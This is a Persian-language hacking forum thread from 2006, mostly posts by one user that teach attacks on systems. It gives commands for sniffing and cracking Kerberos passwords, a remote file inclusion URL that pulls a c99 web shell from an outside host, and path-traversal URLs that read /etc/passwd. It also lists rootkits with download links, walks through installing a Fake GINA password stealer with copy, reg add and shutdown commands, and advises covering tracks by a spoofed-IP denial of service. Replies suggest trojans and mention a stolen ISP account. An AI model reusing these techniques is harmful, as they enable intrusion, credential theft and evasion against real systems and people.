<LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® NT 4.0 Workstation <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® NT 4.0 Server <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® NT 4.0 Server Enterprise Edition <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® NT 4.0 Terminal Server Edition <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® 2000 Professional <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® 2000 Server <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® 2000 Advanced Server <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® XP Professional <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® XP Home Edition <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® 2003 Server Standard Edition <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® 2003 Small Business Server <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® 2003 Server Enterprise Edition <LI class=MsoNormal style="MARGIN: 6pt 0cm 0pt; mso-list: l1 level1 lfo2; tab-stops: list 36.0pt">Microsoft Windows® 2003 Server Web Edition
Microsoft Windows® 2003 Datacenter Edition



لینک دریافت :

http://www.sys-manage.com/english/download/download_Home.html

pastoo
22-09-2006, 12:12
شرح کار :

کار بسیار ساده است اول میروید به Ntsecurity.nu (http://www.ntsecurity.nu/toolbox/kerbcrack/) و دو ابزار kerbcrack و kerbsniff را دریافت می نمایید . ابزار kerbsniff شبکه را تحت نظر می گیرد و به دنبال اطلاعات تعیین هویت حوزه Kerberos و ، ویندوز میگردد و نتایج را در فایلی که شما برایش مشخص میکنید ذخیره میکند !! بعد با استفاده از ابزار ورود به زور و با استفاده از یک فرهنگ لغت ابزار kerbcrack را راه اندازی میکنیم تا به هدف خود که همان کلمات عبور باشد دست پیدا کنیم .

+ مراحل استفاده از ابزار kerbsniff به شرح زیر است :


خود ابزار را راه اندازی میکنیم ، ابزار شبکه های فعال را تشخیص میدهد و آنها را به ما نمایش میدهد . شما باید یکی از آن ها را انتخاب کنید که من شماره 1 انتخاب کردم !!
D:\> KerbSniff.exe zxo003.txt
KerbSniff 1.3d3 - (c) 2002-2005, Arne Vidstrom
- http://ntsecurity.nu/toolbox/kerbcrack/

Available network adapters:

0- 192.168.234.34
1- 192.168.234.33
2- 192.168.208.1
4- 192.168.223.1

Select the network adapter to sniff on: 1



حال بر نامه فعال شده و همینجور نیز فعال می ماند ، بعد از مدتی شما بهتر است که ترکیب دو کلید Ctrl+C را استفاده کنید تا برنامه ناکام بماند و شما بتوانید از نتایج بدست آماده حداکثر سوء استفاده را بکنید ، البته اگر چیزی به دست بی آورد !! حالا ما دیگه کاری با این ابزار نداریم
++ مراحل استفاده از ابزار kerbcrack به شرح زیر است :


این ابزار مثل بقیه ابزار های از این دست است و بر پایه متد ورود به زور کار میکند ، شیوه استفاده به این صورت زیر است .
D:\> Kerbcrack.exe zxo003.txt –d dicitionary.txt
KerbCrack 1.3d3 - (c) 2002-2005, Arne Vidstrom
- http://ntsecurity.nu/toolbox/kerbcrack/

Loaded capture file.

Currently working on :

Account name -administrator
From domain -VEGAS2
Trying password -admin
Trying password -guest
Trying password -root


قابل ذکر است که آخرین کلمه که نمایش میدهد و دیگر تلاش نمی کند آن کلمه ، همان کلمه عبور است .

این برنامه یک سری ریزه کاری های دارد خود شما باید آن یاد بگیرید !!

+ موفق باشید

pastoo
23-09-2006, 22:57
در این فیلم چگونگی هک کردن پرتاله photo Gallery رو یاد میگیرید !!


http://behfaraz.persiangig.com/video...%20Gallery.rar (http://behfaraz.persiangig.com/video/photo%20Gallery.rar)


هر چی خواستید میتونید انجام بدید میتونید Local Root و .... هم کنید


گرفتن cmd در شل های ویندوزی



http://www.mormoroth.persiangig.com/video/wincmd.rar (http://www.mormoroth.persiangig.com/video/wincmd.rar)


http://rapidshare.de/files/27608115/linux.rar.html (http://rapidshare.de/files/27608115/linux.rar.html)

pastoo
25-09-2006, 22:28
یه اکسپلویت کوچولو


http://www.victom.com/index.php?root_path=http://shellurl (http://www.victom.com/index.php?root_path=http://shellurl)
+ Greetz LEzr.com/vB Member's ; My Team ; My Best [ MoHaJaLi ] ;....

search key:
"Open Bulletin Board 1.0.8"

More info:
بجای شل shellurl آدرس اینترنتی همون shell Script هایی رو بدین که قبلا راجبهش صحبت کردیم
مثلا:
c99 => http://mormoroth.by.ru/c99.php (http://mormoroth.by.ru/c99.php)


اینم آموزش تصویریش

http://lightwolf.persiangig.com/E_book_and_Learn/Open_Bulletin_%20Board.rar (http://lightwolf.persiangig.com/E_book_and_Learn/Open_Bulletin_%20Board.rar)


IIS-5 DAV Scanner and Exploiter for Windows 98/ME/NT/2000/XP

Info:
This software is a powerful tool allowing you to exploit, manage and control archive files in hosts with IIS-5 DAV vulnerability. Usually have a list os hosts ".txt" extension. ZIP and other formats are not supported.

Download:

http://rapidshare.de/files/34147875/iis5dav-scan-exploit-2006-2.zip (http://rapidshare.de/files/34147875/iis5dav-scan-exploit-2006-2.zip)
MD5: 57EED3FB5BB3CDB06B82A53F0037969D

pastoo
25-09-2006, 22:34
فیلم آموزشی هک سایت های Remote File Inclusion Exploit رو براتون گذاشتم


Download (http://nimajinx-sari.persiangig.com/Hacking.Remote%20File%20Inclusion%20Exploit.rar)


سلام به تمام دوستان گل خودم امروز هم فیلم آموزشی هک سایت هایی که از پرتال Web3News استفاده می کنن رو گذاشتم http://www.dreamsstation.com/site/modules/Forums/images/smiles/icon_wink.gif


Download (http://nimajinx-sari.persiangig.com/Hacking%20Web3News.NimaJinx.rar)

pastoo
25-09-2006, 22:47
خدا بیامرزه my speach هک را


وقتي داشتم اين چند تا سايت رو هك مي كردم فيلم هم ازش گرفتم كه بزارم شما هم از طريق اين اكسپلويت بتونين اين سايت هارو دفيس كنيد فيلم از زير دانلود كنيد نظر هم يادتون نره باي

Download (http://nimajinx-sari.persiangig.com/Hack.MySpeach5252.rar)

pastoo
25-09-2006, 23:57
اموزش هک JAF CMS

امروز می خوام بهتون یک باگ درست حسابی واسه هک سایتهایی که از JAF CMS استفاده می کنن بذارم که بهتونید اونها رو مورد حمله خودتون قرار بدین.

نوع ورژن: 3.0 به بالا

خوب باگ به این صورته: http://farsiedu.com/jaf/index.php?show=../../../../../../../etc/passwd (http://hackerrrr.tk/jaf/index.php?show=../../../../../../../etc/passwd)
www.farsiedu.com

یا این: http://farsiedu.com/jaf/index.php?show=../../../../../../../e (http://hackerrrr.tk/jaf/index.php?show=../../../../../../../e) tc/hosts


و یا این یکی:http://farsiedu.com/jaf/index.php?show=../../../../../../../etc/httpd/conf/httpd.conf


می باشد که شما به این صورت می تونید به تمام سایت دسترسی داشته باشید

و عشق و حال کنید. www.farsiedu.com

نکته:شما باید جای farsiedu.com اسم سایت مورد نظر خودتونو قرار بدین.

ali9309
26-09-2006, 00:26
سلام خسته نباشيد شرمنده ببخشيد اي دي منو هك كردن ايا نرم افزاري داريد تا من بتونم اي ديمو برگردونم خيلي ممنون مي شم اگه كمكم كنيد با تشكر

topgoal
26-09-2006, 00:37
سلام خسته نباشيد شرمنده ببخشيد اي دي منو هك كردن ايا نرم افزاري داريد تا من بتونم اي ديمو برگردونم خيلي ممنون مي شم اگه كمكم كنيد با تشكر
یه سری روش برای این کار وجود دارد اما برنامه ای که به طور مستقیم پسورد بده وجود ندارد.
میتونید از یه تروجان استفاده کنید و سرور رو در کامپیوتر کسی که آیدی شما رو هک کرده اجرا کنید تا پسورد براتون سند بشه.
این راه ساده ترین راه هست.البته اگر اون سوالاتی که یاهو موقع ثبت نام پرسیده یادتون نیست...

mahdioja
28-09-2006, 13:41
با سلام
میخواستم بدونم ماوقتی به آی اس پی وصل میشیم شماره ما اونجا ثبت میشه ؟
و در صورت امکان راهی رو معرفی کنید تا شماره ما در آی اس پی ثبت نشه
ممنون

kiaka
28-09-2006, 13:58
بله شماره شما ثبت میشه

pastoo
28-09-2006, 17:39
دوست من شماره شما در isp ثبت میشه درون getway و اگر می خواین که نشه باید به getway هم نفوذ کنی و فایل log مخصوص آن را پیدا و پاک کنی
ولی مهم این نیست که شماره شما در isp ثبت بشه مهم این است که ip شما در isp غیر قابل شناسایی باشد یعنی عملیات spoofing خودتان کمی تحقیق کنید

mahdioja
28-09-2006, 22:29
دوستان دوباره سلام
از این که در این مورد نظر دادید ممنون
ولی مهم چرا؟
چون من یه اکانتی رو از یه آی اس پی دو در کرده بودم و داشتم ازش استفاده میکردم که بهم زنگ زدن وگفتن شما دارین از این اکانت استفاده مکنید
واسه این خواستم ببینم کسی در این مورد تجربه ای داره که به من کمک کنه
قربونه شما مرسی

میاندوآبی
29-09-2006, 00:50
دوست من شماره شما در isp ثبت میشه درون getway و اگر می خواین که نشه باید به getway هم نفوذ کنی و فایل log مخصوص آن را پیدا و پاک کنی
ولی مهم این نیست که شماره شما در isp ثبت بشه مهم این است که ip شما در isp غیر قابل شناسایی باشد یعنی عملیات spoofing خودتان کمی تحقیق کنید
میشه لطف کنید خودتون توضیح بدین؟

pastoo
29-09-2006, 02:15
با سلام ؛



آقا یک چند وقتی دوباره ما نبودیم دیدم بازم این بازدید کننده ها شروع کردن به گیر سه پیچ دادن به ما اعضای گرامی !!! ولی اشکال نداره یا ما با این حرفا از میدان به در میریم ( زهی خیال خام ) یا شما ها را از رو میبریم به هر حال ما که رو دست سر گردن پای عیوب (که درود خدا بر او باد) بلند شدیم با این صبر ، ولی ... اما ....



++ خوب در این پست من تصمیم دارم چند Root Kit برای سیستم عامل بیلی (ویندوز) بدون در نظر گرفتن کارای آنها برای شما معرفی کنم و البته نگاهی اجمالی به گوشه ای از قابلیت های آنها بی اندازیم !! البته منظورم از اینکه کارای آنها را در نظر نگرفتم این است که ممکن است بعضی از آنها یک Root Kit سنتی و یا اصلا یک واقعه نگار محض و.... باشد . فقط مهم این است که بر مبنای هسته هستند !!




AFX Root kit 2005 : یکی از جدیدترین و بهترین نوع این کدهای مرگبار است !! این کد هسته بر مبنای زبان بسیار قدرتمند Delphi نوشته شده است ، کد های منبع آن آزاد است و به راحتی میتوانید به آنها دسترسی پیدا کنید و یک نسخه شخصی از آن ایجاد کنید یا قابلیت به آن اضافه یا از آن حذف کنید . حجم این کد برابر با 256 KB است . این کد مرگبار از گیر انداختن توابع API و code injection برای مقاصد پلید خود استفاده میکند ، از قابلیت های آن میتوان به پنهان کردن پردازش ها ، فایل ها ، پورت های باز یا بسته !! کندو ها (شاخه ها) ریجستری و .... را نام برد کارای آن درست است و من تست کردم جواب گرفتم !! یادم رفت بگم که این کد مرگبار مخرب زاییده اینها (http://www.iamaphex.net/) است !! برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر این (http://www.zone-h.org/download/file=5472/) بکوبید !!



hxdef100r : این یکی هم بدک نیست !! این Root Kit یک جعبه ابزار کامل برای کلاه سیاه ها است . این Root Kit بیشترین محبوبیت را در میان عوام کسب کرده و بیشترین استفاده برای تازه کار ها و بیشترین گسترش در شبکه را دارد !! این کد مخرب هم زاییده اینها (http://www.hxdef.org/) است . اوه یادم رفت بگم که حجم این هم 237 KB است . برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر این (http://www.zone-h.org/files/87/hxdef100r.zip) بکوبید !!



klister : یک مجموعه ساده از ابزار ها که در یک جا جمع شده برای بیلی 2000 (WIN2000) است !! این ابزار منتصب به خواندن ساختار اطلاعات هسته داخلی است !! به هر حال این ابزار یکی از پایدار ترین ، نوع این ها است !! این هم زاییده Joanna است که آن هم اینجا (http://www.rootkit.com/) است . این هم حجمی معادل با 112 KB دارد و برای دریافت یک نسخه از این مدل میتوانید توی سر این (http://www.zone-h.org/download/file=5469/) بکوبید !!



patch finder : این ابزار هم یک وسیله برای کشف و آنالیز Path ها برای سیستم عامل بیلی 2000 (WIN2000) است !! این ابزار برای کشف انواع DLL های مخرب و ویروس های وارد شده و rookits ها در آن سیستم و بهره گیری از آنها است . حجمی معادل با 103 KB دارد و باز هم زاییده Joanna است که آن هم اینجا (http://www.rootkit.com/) است . برای دریافت یک نسخه از این مدل میتوانید توی سر این (http://www.zone-h.org/download/file=5470/) بکوبید !



rk 044 : این نخستین Root Kit درست حسابی برای سیستم عامل های بیلی NT بود ، البته بگم که در واقع باید اینگونه گفت : " این کد هسته اولین کد مخرب هسته بود که کارای درستی داشت و به صورت عمومی منتشر شد " . کلمه عمومی مهم است !!! به هر حال مدت چندین سال است که این Root Kit به روز رسانی نشده و قدیمی ولی به هر حال هنوز هم کارای اساس دارد . این کد هم حجمی معادل با 252 KB دارد . برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر این (http://www.zone-h.org/download/file=5466/) بکوبید !!



vanquish : این Root Kit که محصول کشور رومانی است یکی از بهترین کدهای مخرب است! که شیوه کار آن نیز بر پایه تزریق یک کتابخانه دینامیک است (DLL injection) !! از قابلیت های این ابزار میتوان به پنهان کردن فایل ها ، پوشه ها ، ورودی های ریجستری و شاخه ها و کندوهای آن و دستکاری فایل های ثبت رخداد و ..... نام برد .حجم این ابزار 43 KB است . این ابزار زاییده XShadow است و برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر این (http://www.zone-h.org/download/file=5465/) بکوبید !!



VICE : وقتی شما این دارید در واقع یک جیب بر تمام عیار دارید !! این یک ابزار کامل دزدی است ، نوشته fuzen_op (fuzen_op@rootkit.com) است و که آن هم اینجا (http://www.rootkit.com/) است . این کد مخرب حجمی معادل با 66 KB دارد و برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر این (http://www.zone-h.org/download/file=5471/) بکوبید !



Win logon hijack : این کد مخرب یک DLL تزریق میکند به winlogon.exe و بعد دزدی شروع میشود !! در واقع کار اصلی آن این که هر کی وارد بشه اطلاعاتی که وارد میکنه جارو میکنه !! این ابزار هم حجمی معادل با 109 KB دارد و زاییده JeFFOsZ است و که آن هم اینجا (http://www.rootkit.com/) است و برای دریافت یک نسخه از این مدل Root Kit میتوانید توی سر این (http://www.zone-h.org/download/file=5468/) بکوبید !
موفق باشید .

pastoo
29-09-2006, 02:17
يكشنبه ۲۰ آذر ۱۳۸۴

این دفعه شما دوستان را میخواهم با یک مبحث که در تمام نوشته ها و کتب ضد امنیت هم به راحتی نادیده گرفته میشود ، آشنا کنم ! البته من هم مثل همه این موضوع را در ابر E-book خودم نادیده گرفتم !! در واقع این موضوع خودش یک مدل استراق سمع (Sniff) است . در این متد شما بر روی یک پورت سخت افزاری بدون در نظر گرفتن هیچ موضوع دیگری شروع به استراق سمع میکنید !! پورت های سخت افزاری هم چند مدل هستند که من در اینجا دو مدل را مد نظر قرار میدهم یکی پورتهای Serial و دومی پورت های USB ! حوصله معرفی کامل این متد را ندارم ، ولی دو ابزار برای اینها معرفی میکنم و ادامه کار را به خودتان می سپارم .




++ ابزار Serial Monitor ، این برنامه یکی از بهترین برنامه ها برای زیر نظر گرفتن اینگونه پورت ها است ، این ابزار قادر است کلیه رویداد های اتفاق افتاده را ذخیره کند ، میتوان آن را نیز زمان بندی کرد که در چه هنگامی فعال شود و .... {مثلا عملکرد مودم خود را کاملا زیر نظر بگیرید}




++ ابزار USB Monitor ، این ابزار به عنوان ناظری برای پورت های USB به کار برده میشود ، تقریبا عملکرد مشابه ای ابزار بالا دارد ، پس ...




خوب آنهایی که ابر E-BOOK من دانلود کردن و یادشان هست که من گفتم هر چه قدر شما به لایه های پایینی شبکه حمله کنید ، حمله مرگبار تری را سازمان دادید ، چون میتوانید به راحتی حمله خود را گسترش و پوشش بدهید !! خوب در این جا هم من چند ابزار برای این کار به شما معرفی کردم !!

pastoo
29-09-2006, 02:32
این مقاله توسط دوست خوبم Jranil (http://weblog.techopedia.net/) نوشته شده است که دیدم بد نیست در اینجا قرارش بدم. امیدوارم که از این کار من ناراحت نشده باشه
ابتداي تاريخچه كشف DNS Cache Poisoning (http://en.wikipedia.org/wiki/DNS_cache_poisoning) مربوط مي شود به سال 1993 و يافتن ايرادهايي منطقي كه در تعريف DNS وجود داشت و منجر به اولين مورد هاي DNS Cache Poisoning شد. براي مطالعه كامل در مورد تاريخچه و روند بررسي تا به امروز بخوانيد : DNS Cache Poisoning – The Next Generation (http://www.lurhq.com/dnscache.pdf).
مدتي پيش در يعني ماه مارس 2005 يك حمله بسيار گسترده در اين مورد انجام شد. بيش از 500 موسسه بزرگ دنيا قرباني شدند و در سه حمله متوالي وب سايت هاي آن ها به سايت هاي ديگري ( مثل abx4.com ) منحرف شدند. اين حمله ها آغازي بود براي بررسي بيشتر بر روي اين نقص و ارايه راه كار هاي مختلف. در همين زمينه SANS يك گزارش كامل تهيه كرد كه پيش نهاد مي كنم آن را كامل مطالعه كنيد. در اين گزارش آغاز حمله و آمار هاي زيادي وجود دارد : March 2005 DNS Poisoning Summary (http://isc.sans.org/presentations/dnspoisoning.php)
براي اينكه به صورت عملي اين ايراد را ببينيد ( البته در صورتي كه DNS سرور مورد استفاده شما آسيب پذير باشد.) اين صفحه (http://ketil.froyn.name/poison.html) را ببينيد.
اهميت اين ايراد امنيتي به دليل خطري است كه براي تجارت شما و يا اطلاعات شخصي افراد مي تواند داشته باشد. بيشترين ضرري كه اين مورد تا به حال وارد كرده است بر اثر سرقت اطلاعات كارت هاي اعتباري مي باشد. فرض كنيد كاربر شبكه شما قصد خريد آنلاين داشته باشد و به علت نقص DNS سرور شما اطلاعات او دزديده شود. و يا شريك تجاري شما قصد بازديد از وب سايت شركت شما را داشته باشد ولي به علت ايراد يك DNS سرور به سايت مستهجن هدايت شود.
روش هايي كه براي پيشگيري از اين موارد ( و شايد ساير آسيب پذيري ها ) وجود دارند :
- هميشه DNS سرور شبكه خود را بروز كنيد. اگر مانند اكثر شبكه ها از BIND استفاده مي كنيد، حتما به نسخه اي بالاتر از 9.2.5 مهاجرت كنيد و اگر اين امكان را نداريد از DNSSec (http://www.dnssec.net/) استفاده كنيد. براي آشنايي بيشتر با DNSSec (http://www.dnssec.net/) اين مقاله را بخوانيد : The Basics of DNSSEC (http://www.onlamp.com/pub/a/onlamp/2004/10/14/dnssec.html)
- اگر كمي حوصله داريد و كنجكاو هستيد از djbdns (http://cr.yp.to/djbdns.html) استفاده كنيد. djbdns نوشته Dan Bernstein (http://cr.yp.to/djb.html) ( همان خالق qmail ) مي باشد كه با هدف بر از بين بردن آسيب پذيري هاي BIND و مانند ساير محصولات او با تفكر امنيتي خلق شده است. اگر شبكه شما در حد متوسط است و تحمل چند ساعت اختلال براي آن امكان پذير است پيشنهاد مي كنم از اين محصول استفاده كنيد. هم تجربه تازه اي است و هم خود را از بسياري آسيب پذيري ها دور نگه داشته ايد. براي شروع نصب مي توانيد از اين راهنما استفاده كنيد : Installing djbdns for Name Service (http://www.securityfocus.com/infocus/1438) - همچنين ايشون نوشته اي در مورد Domain Name System دارند كه بسيار آموزنده است. مخصوصا در مورد مفاهيم امنيتي به شما كمك ويژه اي خواهد كرد. اگر به مفاهيم شبكه علاقه مند هستيد اين نوشته جزو Most Read شما است : Notes on the Domain Name System (http://cr.yp.to/djbdns/notes.html)
چند توصيه هم در آخر كه هركدام بسته به شرايط شما مي توانيد براي شبكه اي امن تر مفيد واقع شود. تمامي اين موارد بدون توجه به name server شما قابل توجه هستند:
- در صورت امكان name server هاي خود را به صورت جداگانه در سگمنت هاي مختلف شبكه پياده كنيد. در اين حالت مي توانيد redundancy را در مورد name server هاي خودتان پياده كنيد. دقت داشته باشيد در اين حالت مي بايست براي يك راه حل جهت هماهنگي بين آن ها نيز تصميم گيري كنيد.
- در صورت كه اين امكان را داريد name server داخلي و خارجي شبكه خود را از هم مجزا كنيد و از forwarder ها براي شبكه داخلي استفاده كنيد. سرويس دهنده نام خارجي مي بايست به هر درخواستي پاسخ دهد به جز forwarder ها.
- اگر امكان داريد dynamic DNS updates را محدود كنيد. البته در صورتي كه از Directory Service ها استفاده كنيد ممكن است نتوانيد از اين مورد بهره جوييد.
- روش ديگري كه در مورد بسياري از سرويس هاي حياتي شبكه شما مي تواند مهم باشد پنهان كردن ورژن برنامه سرويس دهنده است. اگر از BIND استفاده مي كنيد حتما اين كار را انجام دهيد.
- سرويس هاي اضافه را بر روي ماشين سرور غير فعال كنيد و از يك فايروال كه به خوبي براي پاسخ به درخواست هاي مربوطه تنظيم شده است استفاده كنيد.

pastoo
29-09-2006, 02:58
میشه لطف کنید خودتون توضیح بدین؟





پاک کردن رد پای خود در شبکه

این مسئله یکی از مسئله هایی می باشد که خیلی از هکران تازه کار با آن در ارتباط می باشند . و این هم به بالا بالا پریدن هکران ایرانی مربوط می شود !!!
فرظ کنید یکی از دوستان میره یک آی اس پی رو اکسپلویت می کنه . بعد اکونت هاشو راحت کش میره بعدش تا میاد کرکشون کنه صاحاب آی اس پی با پلیس دم در خونشونه !!!!!!!!!!! اونوقت که دیگه هک کردن از سرش میپره .بعله ولی برای جلوگیری از این کار دو راه هست. یکی اینکه بی خیال هک شبکه های ایرانی بشه . به خارجی ها گیر بده اکونت هم پول بده بخر !!!!!!!!! یا این که وقتی کارت تو شبکه تموو شد ردت رو پاک کنی. برای این کار اول باید ببینیم که رد ما اصلا کجا می افته . رد ما روی یک سری فایل لوگ می افته و اونجا صبت میشه حالا چه جوری اونو پاک کنیم ؟ بعضی از دوستان می رند اون فایلها رو پاک می کنند . ولی این کار جوابگو نیست . بهترین کار DoS کردن سرور مورد نظره . بله شما سرور رو به صورت آی پی Spoof داس کنید تا رد پاتون به صورت کامل پاک شه . برای اینکه با آی پی اسپوف داس کنید تا فایروال شبکه نتونه آی پی شما رو بلاک کنه احتیاج به یه برنامه ساده ولی کارا دارین . به نظر من بهترین این برنامه ها برنامه Nemesy هست که با تنظیمات خیلی ساده فقط با وارد کردن آی پی و حجم بسته ها سرور مورد نظر رو داس می کنید

pastoo
29-09-2006, 03:00
( دوستان تازه کار حتما اين مقاله رو کامل بخونيد و همش رو ياد بگيريد چون يکی از پايه ترين اساس هک کردن سايت ها می باشد )

خوب اینم سوال :
سلام من مطالب گوناگونی در باره اکسپلویت ها خوانده ام . ولی هیچکدام نحوه ارسال اکسپلویت به برنامه داخل سیستم قربانی که vul مربوطه را ايجاد کرده را با جزئيات توضيح نداده اند.لطفا اگر شما می دانيد در مورد چگونگيه ارسال يک اکسپلويت که بصورت يک فايل سورس c می باشد با تمام جزييات ( ترجيحا بصورت عملی ) توضيح دهيد .

خوب اول به دوستان تازه کار بگم که اصلا از شنيدن اصطلاحاتی که در موردش چيزی نمی دونيد وحشت نکنيد . من همه رو واستون توضيح می دم . اول در مورده اصطلاحاتی که بهشون احتياج هست توضيح مختصر می دم بعد هم جواب دوستمون رو می دم .

باگ يا vul چيست ؟
به نقطه ضعف ها و حفره های موجود در يک برنامه . سايت يا سيستم عامل يک باگ می گويند . اين باگ ها توسط برنامه نويسان و هکرها کشف شده و پس از کشف يک باگ اکسپلويت آن برای حمله نوشته می شود .
اکسپلويت چيست ؟
اکسپلويت يکسری کد های حمله هستند که با زبان های برنامه نويسيه سی يا پرل نوشته می شن . با اين کد های حمله بعد از کامپايل شدن می شود به باگ ها ( در صورت وجود ) حمله کرد .

کامپايل کردن چيست ؟
وقتی برای حمله به يک باگ در اينترنت به دنبال اکسپلويت آن می گرديد اغلب به يک سورس ( کد ) آن اکسپلويت می رسيد . اين سورس برای شما قابل استفاده نمی باشد و شما بايد برای استفاده آن را کامپايل ( از پسوند c يا pl به exe تغيير دهيد ) شرح اين کار در پايين همين مقاله آمده .

Shell چيست ؟
شل به معنای اتصال از طريق داس به هارد يک کامپيوتر يا شرکت يا سيستم ميباشد . با استفاده از بعضی از اکسپلويت ها می توان از ای پی مورد نظر شل گرفت.
خوب حالا جواب دوستمون :
پارسا جان مثل اينکه شما درباره اکسپلويت به اندازه کافی تحقيق نکرده ايد چون اصلا اکسپلويتی که به صورت سورس است را که برای کسی نمی فرستند . http://www.persianblog.com/pbe34r2/images/smileys/03.gif بلکه شما بايد اول آن را کامپايل کنيد و بعد از راه دور به کامپيوتر حاوی باگ حمله کنيد . حالا من روش های کامپايل رو برات شرح می دم .
شما از طريق دو سيستم عامل لينوکس و ويندوز می توانيد اکسپلويت های خود را کامپايل کنيد . توصيه من لينوکسه چون اکثر اکسپلويت ها در اون کامپايل ميشن ولی در ويندوز چون بعضی از هدر ها رو شامل نمی شه نميشه همه اکسپلويت ها رو کامپايل کرد .
اول ويندوز رو می گم :
ما دو نوع اکسپلويت داريم يکی اونايی که با زبان پرل نوشته شدن ويکی هم اونايی که با سی نوشته شدن اول پرل :
به يک برنامه کامپايلر به نام Activeperl احتياج دارين . که برای دانلود می تونيد تو گوگل سرچ کنيد .
برای سی هم که ديگه کاری نداره می تونيد خود برنامه Visual Studio رو نصب کنيد و از همون طريق کامپايلش کنيد . که احتياجی به توضيح نداره .
تو لينوکس رو هم نمی گم چون اکثرا لينوکس ندارين اگه کسی آموزش اونو خواست بگه واسش بنويسم .
خوب حالا که اکسپلويتتون کامپايل شده بايد اونو اجرا کنيد . و شما نمی تونيد اونو با کليک کردن اجرا کنيد چون باز نميشه برای اينکار بايد اکسپلويت کامپايل شده را در دايرکتوری ويندوزتون در پوشه System32 کپی کنيد . و بعد به منوی استار رفته و روی گزينه Run کليک کنيد و سپس تايپ کنيد :
cmd
حالا داس ويندوز باز شده حالا بايد اسم اکسپيويتتون رو تايپ کنيد بطور مثال :
lsas.exe
و اکسپلويت هم نحوه کار رو داخل همون داس ويندوز توضيح می ده که اگه يه کم زبان بلد باشين می فهميد . مثلا همين اکسپلويت بالا. با نوشتن ای پی و يک پورت انتخابی مثل ۶۶۶۹ يا ۵۲۷۷ .نوع سيستم عامل طرف رو به شما می ده و اگر سيستم طرف ويندوز سری ان تی قديمی ( مثلا ماله پارسال ) باشه به پورتی که شما دادين حمله می کنه و کاری می کنه که شما می تونيد با يه تلنت به اون پورت به شل ( Shell) سيستم قربانيتون برسيد

pastoo
29-09-2006, 03:03
ادامه کار یعنی پیدا کردن باگ و exploit آن را که چندین بار گفتم
ببینم کسی هست این جا بگه ادامه راه چیه ؟
فقط کافیه 1 دور مقالات را خوانده باشی تا به این سوال پاسخ دهی

pastoo
30-09-2006, 20:40
لطفا دوستان تایپیک زیر را خوانده و نظرشان را اعلام کنن

http://www.asrejavaan.com/showthread.php?t=106329


با تشکر

pastoo
30-09-2006, 23:48
Graphical Identification and Authorization یا به عبارت ساده تر GINA میدانید چه هست ؟؟ در واقع این واسطه ای بین کاربر و سیستم تعیین هویت ویندوز است ، خوب حالا اگر به جای نسخه اصلی آن ما یک نسخه سمی و دستکاری شده قرار بدهیم چگونه است !! بله درست فهمیدید به همین راحتی هر کاربری که به سیستم وارد شود ما به کلمه عبور آن پی میبریم .




به این منظور من به شما یک نوع Fake GINA را معرفی میکنم ، قبل از هر چیز به Ntsecurity.nu (http://www.ntsecurity.nu/) بروید و FakeGina.dll را که Arne Vidstrom نوشته را دریافت کنید ، خوب ما فکر میکنیم شما به سیستم دسترسی دارید و امتیاز شما در حد یک مدیر است ، در این هنگام با استفاده از دستور زیر FakeGina.dll را در پوشه %SystemRoot%\system32 کپی میکنید (روی قربانی!!) .




C:\>copy fakegina.dll \\ 10.1.1.3\admin$\system32




خوب حالا یک نگاهی به Resource Kit های بیلی می اندازیم و ابزار reg.exe را پیدا میکنیم و با سوءاستفاده از آن مقدار زیر را به Registry قربانی وارد میکنیم . (به مقدار توجه کنید)




C:\>reg add "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDLL=fakegina.dll" REG_SZ \\10.1.1.3




خوب حالا نگاهی دوباره به Resource Kit های بیلی می اندازیم و ابزار shutdown را پیدا میکنیم و با سوء استفاده از آن سیستم را دوباره راه اندازی میکنیم .




C:\>shutdown \\10.1.1.3 /R /T:1 /Y /C




خوب عملیات دزدی به پایان رسید حالا منتظر میشویم یک کاربر به سیستم وارد شود ، وقتی وارد شد کافی است که شما یک نگاهی به فایل %SystemRoot%\system32\passlist.txt بیندازید .




راه دفاع :




قبل از هر چیز fakegina.dll و passlist.txt را جستجو کنید اگر آنها را یافتید که آنها را نابود کنید ، حال بهتر است یک نسخه GINA سالم را دوباره نصب کنید !! و کلید Registry را به حالت اول باز گردانید . ( البته من توصیه میکنم یک بار دیگه بیلی را روی سیستم خود نصب کنید . )



+ موفق پیروز باشید

VH-1
30-09-2006, 23:56
آقا واقعاً دستت درد نکنه خیلی وقت بود دنبال همچین مقاله های توپی بودم دستت طلا

pastoo
30-09-2006, 23:59
